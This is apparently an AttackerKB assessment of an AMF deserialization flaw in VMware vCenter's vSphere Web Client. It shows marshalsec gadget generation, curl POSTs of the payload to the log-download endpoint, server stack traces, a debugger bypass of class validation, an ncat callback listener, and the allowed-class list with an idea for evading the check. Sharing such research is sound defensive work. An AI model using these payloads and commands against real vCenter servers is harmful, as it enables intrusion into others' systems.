100%); /* IE10+ */ background: linear-gradient(to bottom, #3a8dc8 0%,#183a62 100%); /* W3C */ filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#3a8dc8', endColorstr='#183a62',GradientType=0 ); /* IE6-9 */ background-repeat: no-repeat; height: 100%; overflow: auto; margin: 0; padding: 0; } #errorAreaWrapper { position: relative; float: left; left: 50%; margin-top: 30px; } #errorArea { position: relative; float: left; left: -50%; padding: 15px; background-color: white; font-size: 14px; color: #000000; font-family: Georgia, Arial, Helvetica, sans-serif; border: 1px solid black; } #errorImage { border: 0; margin-right: 10px; display: inline-block; vertical-align: top; } #errorAllText { display: inline-block; vertical-align: top; min-width: 500px; max-width: 700px; } #errorSorry { font-weight: bold; } #errorMessage { padding-top: 10px; padding-bottom: 10px; } #errorCheckLog { font-style: italic; } </style> </head> <body> <div id="errorAreaWrapper"> <div id="errorArea"> <div id="errorImage"><img src="/vsphere-client/assets/warning48x.png" alt="Error" /></div> <div id="errorAllText"> <div id="errorSorry">A server error occurred.</div> <div id="errorMessage">Unknown AMF type '65'.</div> <div id="errorCheckLog">Check the vSphere Web Client server logs for details.</div> </div> </div> </div> </body> </html> * Closing connection 0 * TLSv1.2 (OUT), TLS alert, close notify (256): wvu@kharak:~$
[2021-12-04T01:02:59.500Z] [WARN ] http-nio-9090-exec-7 70000069 ###### ###### com.vmware.vsphere.client.logbundle.DownloadLogController ClientId is null. [2021-12-04T01:02:59.507Z] [ERROR] http-nio-9090-exec-7 o.a.c.c.C.[.[localhost].[/vsphere-client].[downloadManager] Servlet.service() for servlet [downloadManager] in context with path [/vsphere-client] threw exception [Request processing failed; nested exception is flex.messaging.io.UnknownTypeException: Unknown AMF type '65'.] with root cause flex.messaging.io.UnknownTypeException: Unknown AMF type '65'. at flex.messaging.io.amf.Amf3Input.readObjectValue(Amf3Input.java:232) at flex.messaging.io.amf.Amf3Input.readObject(Amf3Input.java:134) at com.vmware.vsphere.client.logbundle.DownloadLogController.parseSelectedLogsSpec(DownloadLogController.java:745) at com.vmware.vsphere.client.logbundle.DownloadLogController.processSelectedLogsSpecParameter(DownloadLogController.java:584) at com.vmware.vsphere.client.logbundle.DownloadLogController.downloadLogBundles(DownloadLogController.java:201) at sun.reflect.GeneratedMethodAccessor196.invoke(Unknown Source) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) at java.lang.reflect.Method.invoke(Method.java:498) at org.springframework.web.bind.annotation.support.HandlerMethodInvoker.invokeHandlerMethod(HandlerMethodInvoker.java:181) at org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter.invokeHandlerMethod(AnnotationMethodHandlerAdapter.java:440) at org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter.handle(AnnotationMethodHandlerAdapter.java:428) at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:967) at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:901) at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:970) at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:872) at javax.servlet.http.HttpServlet.service(HttpServlet.java:661) at org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:846) at javax.servlet.http.HttpServlet.service(HttpServlet.java:742) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:231) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:317) at org.springframework.security.web.access.intercept.FilterSecurityInterceptor.invoke(FilterSecurityInterceptor.java:127) at org.springframework.security.web.access.intercept.FilterSecurityInterceptor.doFilter(FilterSecurityInterceptor.java:91) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.access.ExceptionTranslationFilter.doFilter(ExceptionTranslationFilter.java:114) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.session.SessionManagementFilter.doFilter(SessionManagementFilter.java:137) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.authentication.AnonymousAuthenticationFilter.doFilter(AnonymousAuthenticationFilter.java:111) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.authentication.rememberme.RememberMeAuthenticationFilter.doFilter(RememberMeAuthenticationFilter.java:150) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.servletapi.SecurityContextHolderAwareRequestFilter.doFilter(SecurityContextHolderAwareRequestFilter.java:170) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.savedrequest.RequestCacheAwareFilter.doFilter(RequestCacheAwareFilter.java:63) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.authentication.AbstractAuthenticationProcessingFilter.doFilter(AbstractAuthenticationProcessingFilter.java:200) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.authentication.logout.LogoutFilter.doFilter(LogoutFilter.java:116) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.header.HeaderWriterFilter.doFilterInternal(HeaderWriterFilter.java:66) at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.context.request.async.WebAsyncManagerIntegrationFilter.doFilterInternal(WebAsyncManagerIntegrationFilter.java:56) at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.context.SecurityContextPersistenceFilter.doFilter(SecurityContextPersistenceFilter.java:105) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at com.vmware.vise.security.websso.SecurityRequestWrapperFilter.doFilterInternal(SecurityRequestWrapperFilter.java:47) at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.FilterChainProxy.doFilterInternal(FilterChainProxy.java:214) at org.springframework.security.web.FilterChainProxy.doFilter(FilterChainProxy.java:177) at org.springframework.web.filter.DelegatingFilterProxy.invokeDelegate(DelegatingFilterProxy.java:347) at org.springframework.web.filter.DelegatingFilterProxy.doFilter(DelegatingFilterProxy.java:263) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at com.vmware.vise.security.SessionManagementFilter.doFilter(SessionManagementFilter.java:177) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at com.vmware.vsphere.client.logging.MDCLogFilter.doFilterInternal(MDCLogFilter.java:41) at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at com.vmware.vise.extensionfw.DeploymentFilter.doFilter(DeploymentFilter.java:55) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at com.vmware.vise.util.jsp.JspFilter.doFilterInternal(JspFilter.java:91) at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at com.vmware.vise.security.SameSiteCookieHeaderFilter.doFilter(SameSiteCookieHeaderFilter.java:73) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:199) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97) at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:544) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:143) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:81) at org.apache.catalina.valves.RemoteIpValve.invoke(RemoteIpValve.java:764) at org.eclipse.virgo.web.tomcat.support.ApplicationNameTrackingValve.invoke(ApplicationNameTrackingValve.java:33) at org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:690) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:343) at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:616) at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65) at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:831) at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1634) at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) at java.lang.Thread.run(Thread.java:748)
Testing AMF deserialization using the UnicastRef
gadget
root@895ea1dbdd95:~/marshalsec# java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.BlazeDSAMF3 UnicastRef 172.16.57.1 4444 | base64 -w 0 | xargs Cgczc3VuLnJtaS5zZXJ2ZXIuVW5pY2FzdFJlZgALMTcyLjE2LjU3LjEAABFcAAAAAHyVTXIAAAAAAAAAAAAAAAAAAAA= root@895ea1dbdd95:~/marshalsec#
wvu@kharak:~$ curl -kv https://172.16.57.237/vsphere-client/download/logs -d "webClientSessionId=nope&SelectedLogsSpec=Cgczc3VuLnJtaS5zZXJ2ZXIuVW5pY2FzdFJlZgALMTcyLjE2LjU3LjEAABFcAAAAAHyVTXIAAAAAAAAAAAAAAAAAAAA=" * Trying 172.16.57.237:443... * Connected to 172.16.57.237 (172.16.57.237) port 443 (#0) * ALPN, offering h2 * ALPN, offering http/1.1 * TLSv1.3 (OUT), TLS handshake, Client hello (1): * TLSv1.3 (IN), TLS handshake, Server hello (2): * TLSv1.2 (IN), TLS handshake, Certificate (11): * TLSv1.2 (IN), TLS handshake, Server key exchange (12): * TLSv1.2 (IN), TLS handshake, Server finished (14): * TLSv1.2 (OUT), TLS handshake, Client key exchange (16): * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1): * TLSv1.2 (OUT), TLS handshake, Finished (20): * TLSv1.2 (IN), TLS handshake, Finished (20): * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384 * ALPN, server did not agree to a protocol * Server certificate: * subject: CN=172.16.57.237; C=US * start date: Nov 30 23:59:14 2021 GMT * expire date: Dec 1 11:59:14 2023 GMT * issuer: CN=CA; DC=vsphere; DC=local; C=US; ST=California; O=photon-machine; OU=VMware Engineering * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway. > POST /vsphere-client/download/logs HTTP/1.1 > Host: 172.16.57.237 > User-Agent: curl/7.80.0 > Accept: */* > Content-Length: 133 > Content-Type: application/x-www-form-urlencoded > * Mark bundle as not supporting multiuse < HTTP/1.1 500 < Set-Cookie: JSESSIONID=FCDFEC1FA6DBC64A0638002A142EB766; Path=/vsphere-client; Secure; HttpOnly < Cache-Control: no-cache, no-store, max-age=0, must-revalidate < Pragma: no-cache < Expires: 0 < Strict-Transport-Security: max-age=31536000 ; includeSubDomains < X-XSS-Protection: 1; mode=block < X-Frame-Options: SAMEORIGIN < X-Content-Type-Options: nosniff < Content-Type: text/html;charset=utf-8 < Content-Length: 2963 < Date: Sat, 04 Dec 2021 01:04:57 GMT < Connection: close < Server: Anonymous < <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- saved from url=(0014)about:internet --> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <style type="text/css" media="screen"> html { background: #3075ab; /* Old browsers */ background: -moz-linear-gradient(top, #3a8dc8 0%, #183a62 100%); /* FF3.6+ */ background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#3a8dc8), color-stop(100%,#183a62)); /* Chrome,Safari4+ */ background: -webkit-linear-gradient(top, #3a8dc8 0%,#183a62 100%); /* Chrome10+,Safari5.1+ */ background: -o-linear-gradient(top, #3a8dc8 0%,#183a62 100%); /* Opera 11.10+ */ background: -ms-linear-gradient(top, #3a8dc8 0%,#183a62 100%); /* IE10+ */ background: linear-gradient(to bottom, #3a8dc8 0%,#183a62 100%); /* W3C */ filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#3a8dc8', endColorstr='#183a62',GradientType=0 ); /* IE6-9 */ background-repeat: no-repeat; height: 100%; overflow: auto; margin: 0; padding: 0; } #errorAreaWrapper { position: relative; float: left; left: 50%; margin-top: 30px; } #errorArea { position: relative; float: left; left: -50%; padding: 15px; background-color: white; font-size: 14px; color: #000000; font-family: Georgia, Arial, Helvetica, sans-serif; border: 1px solid black; } #errorImage { border: 0; margin-right: 10px; display: inline-block; vertical-align: top; } #errorAllText { display: inline-block; vertical-align: top; min-width: 500px; max-width: 700px; } #errorSorry { font-weight: bold; } #errorMessage { padding-top: 10px; padding-bottom: 10px; } #errorCheckLog { font-style: italic; } </style> </head> <body> <div id="errorAreaWrapper"> <div id="errorArea"> <div id="errorImage"><img src="/vsphere-client/assets/warning48x.png" alt="Error" /></div> <div id="errorAllText"> <div id="errorSorry">A server error occurred.</div> <div id="errorMessage">Creation validation for class 'sun.rmi.server.UnicastRef' failed.</div> <div id="errorCheckLog">Check the vSphere Web Client server logs for details.</div> </div> </div> </div> </body> </html> * Closing connection 0 * TLSv1.2 (OUT), TLS alert, close notify (256): wvu@kharak:~$
[2021-12-04T01:04:48.349Z] [WARN ] http-nio-9090-exec-1 70000071 ###### ###### com.vmware.vsphere.client.logbundle.DownloadLogController ClientId is null. [2021-12-04T01:04:48.353Z] [WARN ] http-nio-9090-exec-1 70000071 ###### ###### c.vmware.vise.messaging.validators.ClassDeserializationValidator Deserialization skipped for type sun.rmi.server.UnicastRef [2021-12-04T01:04:57.329Z] [ERROR] http-nio-9090-exec-1 o.a.c.c.C.[.[localhost].[/vsphere-client].[downloadManager] Servlet.service() for servlet [downloadManager] in context with path [/vsphere-client] threw exception [Request processing failed; nested exception is flex.messaging.io.SerializationException: Creation validation for class 'sun.rmi.server.UnicastRef' failed.] with root cause flex.messaging.io.SerializationException: Creation validation for class 'sun.rmi.server.UnicastRef' failed. at flex.messaging.util.ClassUtil.validateCreation(ClassUtil.java:354) at flex.messaging.util.ClassUtil.createDefaultInstance(ClassUtil.java:115) at flex.messaging.io.AbstractProxy.createInstanceFromClassName(AbstractProxy.java:95) at flex.messaging.io.AbstractProxy.createInstance(AbstractProxy.java:115) at flex.messaging.io.amf.AbstractAmfInput.createObjectInstance(AbstractAmfInput.java:169) at flex.messaging.io.amf.Amf3Input.readScriptObject(Amf3Input.java:748) at flex.messaging.io.amf.Amf3Input.readObjectValue(Amf3Input.java:156) at flex.messaging.io.amf.Amf3Input.readObject(Amf3Input.java:134) at com.vmware.vsphere.client.logbundle.DownloadLogController.parseSelectedLogsSpec(DownloadLogController.java:745) at com.vmware.vsphere.client.logbundle.DownloadLogController.processSelectedLogsSpecParameter(DownloadLogController.java:584) at com.vmware.vsphere.client.logbundle.DownloadLogController.downloadLogBundles(DownloadLogController.java:201) at sun.reflect.GeneratedMethodAccessor196.invoke(Unknown Source) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) at java.lang.reflect.Method.invoke(Method.java:498) at org.springframework.web.bind.annotation.support.HandlerMethodInvoker.invokeHandlerMethod(HandlerMethodInvoker.java:181) at org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter.invokeHandlerMethod(AnnotationMethodHandlerAdapter.java:440) at org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter.handle(AnnotationMethodHandlerAdapter.java:428) at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:967) at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:901) at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:970) at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:872) at javax.servlet.http.HttpServlet.service(HttpServlet.java:661) at org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:846) at javax.servlet.http.HttpServlet.service(HttpServlet.java:742) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:231) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:317) at org.springframework.security.web.access.intercept.FilterSecurityInterceptor.invoke(FilterSecurityInterceptor.java:127) at org.springframework.security.web.access.intercept.FilterSecurityInterceptor.doFilter(FilterSecurityInterceptor.java:91) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.access.ExceptionTranslationFilter.doFilter(ExceptionTranslationFilter.java:114) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.session.SessionManagementFilter.doFilter(SessionManagementFilter.java:137) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.authentication.AnonymousAuthenticationFilter.doFilter(AnonymousAuthenticationFilter.java:111) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.authentication.rememberme.RememberMeAuthenticationFilter.doFilter(RememberMeAuthenticationFilter.java:150) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.servletapi.SecurityContextHolderAwareRequestFilter.doFilter(SecurityContextHolderAwareRequestFilter.java:170) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.savedrequest.RequestCacheAwareFilter.doFilter(RequestCacheAwareFilter.java:63) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.authentication.AbstractAuthenticationProcessingFilter.doFilter(AbstractAuthenticationProcessingFilter.java:200) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.authentication.logout.LogoutFilter.doFilter(LogoutFilter.java:116) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.header.HeaderWriterFilter.doFilterInternal(HeaderWriterFilter.java:66) at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.context.request.async.WebAsyncManagerIntegrationFilter.doFilterInternal(WebAsyncManagerIntegrationFilter.java:56) at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.context.SecurityContextPersistenceFilter.doFilter(SecurityContextPersistenceFilter.java:105) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at com.vmware.vise.security.websso.SecurityRequestWrapperFilter.doFilterInternal(SecurityRequestWrapperFilter.java:47) at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107) at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331) at org.springframework.security.web.FilterChainProxy.doFilterInternal(FilterChainProxy.java:214) at org.springframework.security.web.FilterChainProxy.doFilter(FilterChainProxy.java:177) at org.springframework.web.filter.DelegatingFilterProxy.invokeDelegate(DelegatingFilterProxy.java:347) at org.springframework.web.filter.DelegatingFilterProxy.doFilter(DelegatingFilterProxy.java:263) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at com.vmware.vise.security.SessionManagementFilter.doFilter(SessionManagementFilter.java:177) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at com.vmware.vsphere.client.logging.MDCLogFilter.doFilterInternal(MDCLogFilter.java:41) at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at com.vmware.vise.extensionfw.DeploymentFilter.doFilter(DeploymentFilter.java:55) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at com.vmware.vise.util.jsp.JspFilter.doFilterInternal(JspFilter.java:91) at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at com.vmware.vise.security.SameSiteCookieHeaderFilter.doFilter(SameSiteCookieHeaderFilter.java:73) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:199) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97) at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:544) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:143) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:81) at org.apache.catalina.valves.RemoteIpValve.invoke(RemoteIpValve.java:764) at org.eclipse.virgo.web.tomcat.support.ApplicationNameTrackingValve.invoke(ApplicationNameTrackingValve.java:33) at org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:690) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:343) at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:616) at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65) at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:831) at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1634) at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) at java.lang.Thread.run(Thread.java:748)
Testing RCE by forcing it in a debugger, lol
wvu@kharak:~$ curl -kv https://172.16.57.237/vsphere-client/download/logs -d "webClientSessionId=nope&SelectedLogsSpec=Cgczc3VuLnJtaS5zZXJ2ZXIuVW5pY2FzdFJlZgALMTcyLjE2LjU3LjEAABFcAAAAAHyVTXIAAAAAAAAAAAAAAAAAAAA=" * Trying 172.16.57.237:443... * Connected to 172.16.57.237 (172.16.57.237) port 443 (#0) * ALPN, offering h2 * ALPN, offering http/1.1 * TLSv1.3 (OUT), TLS handshake, Client hello (1): * TLSv1.3 (IN), TLS handshake, Server hello (2): * TLSv1.2 (IN), TLS handshake, Certificate (11): * TLSv1.2 (IN), TLS handshake, Server key exchange (12): * TLSv1.2 (IN), TLS handshake, Server finished (14): * TLSv1.2 (OUT), TLS handshake, Client key exchange (16): * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1): * TLSv1.2 (OUT), TLS handshake, Finished (20): * TLSv1.2 (IN), TLS handshake, Finished (20): * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384 * ALPN, server did not agree to a protocol * Server certificate: * subject: CN=172.16.57.237; C=US * start date: Nov 30 23:59:14 2021 GMT * expire date: Dec 1 11:59:14 2023 GMT * issuer: CN=CA; DC=vsphere; DC=local; C=US; ST=California; O=photon-machine; OU=VMware Engineering * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway. > POST /vsphere-client/download/logs HTTP/1.1 > Host: 172.16.57.237 > User-Agent: curl/7.80.0 > Accept: */* > Content-Length: 133 > Content-Type: application/x-www-form-urlencoded >
Breakpoint hit: "thread=http-nio-9090-exec-10", flex.messaging.util.ClassUtil.validateCreation(), line=351 bci=76 351 if (!valid) { http-nio-9090-exec-10[1] print valid valid = false http-nio-9090-exec-10[1] set valid = true valid = true = true http-nio-9090-exec-10[1] cont >
wvu@kharak:~$ ncat -lkv 4444 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 172.16.57.237. Ncat: Connection from 172.16.57.237:41660. JRMIK
Listing the allowed class patterns for future work
DataService.util.* \[B \[Ljava.lang.Object; antrun.* cis.ds.* classes.* classes.com.vmware.vim.binding.phonehome.* classes.com.vmware.vim.sso.* com.vmware.* flex.messaging.io.ArrayCollection flex.messaging.io.ArrayList flex.messaging.io.amf.ASObject flex.messaging.io.amf.SerializedObject flex.messaging.messages.AcknowledgeMessage flex.messaging.messages.AcknowledgeMessageExt flex.messaging.messages.AsyncMessage flex.messaging.messages.AsyncMessageExt flex.messaging.messages.CommandMessage flex.messaging.messages.CommandMessageExt flex.messaging.messages.ErrorMessage flex.messaging.messages.HTTPMessage flex.messaging.messages.RemotingMessage flex.messaging.messages.SOAPMessage java.lang.Boolean java.lang.Byte java.lang.Character java.lang.Double java.lang.Float java.lang.Integer java.lang.Long java.lang.Object java.lang.Short java.lang.String java.util.ArrayList java.util.Date java.util.HashMap lib.* metadata.* mozilla.* org.apache.commons.net.* org.apache.commons.net.bsd.* org.apache.commons.net.chargen.* org.apache.commons.net.daytime.* org.apache.commons.net.discard.* org.apache.commons.net.echo.* org.apache.commons.net.finger.* org.apache.commons.net.ftp.* org.apache.commons.net.ftp.parser.* org.apache.commons.net.imap.* org.apache.commons.net.io.* org.apache.commons.net.nntp.* org.apache.commons.net.ntp.* org.apache.commons.net.pop3.* org.apache.commons.net.smtp.* org.apache.commons.net.telnet.* org.apache.commons.net.tftp.* org.apache.commons.net.time.* org.apache.commons.net.util.* org.apache.commons.net.whois.* org.json.* org.w3c.dom.Document schema.*
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportCVSS V3 Severity and Metrics
General Information
Vendors
- vmware
Products
- cloud foundation 3.0,
- vcenter server 6.5,
- vcenter server 6.7
References
Additional Info
Technical Analysis
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Can’t find the def’n of the SelectedLogsSpec object, but maybe you could nest a Unicast object within an instance of a valid SelectedLogsSpec object? Should pass verification (in theory).
I haven’t forgotten about this. I’ll circle back to it later. Thanks!
https://twitter.com/wvuuuuuuuuuuuuu/status/1468418915994898434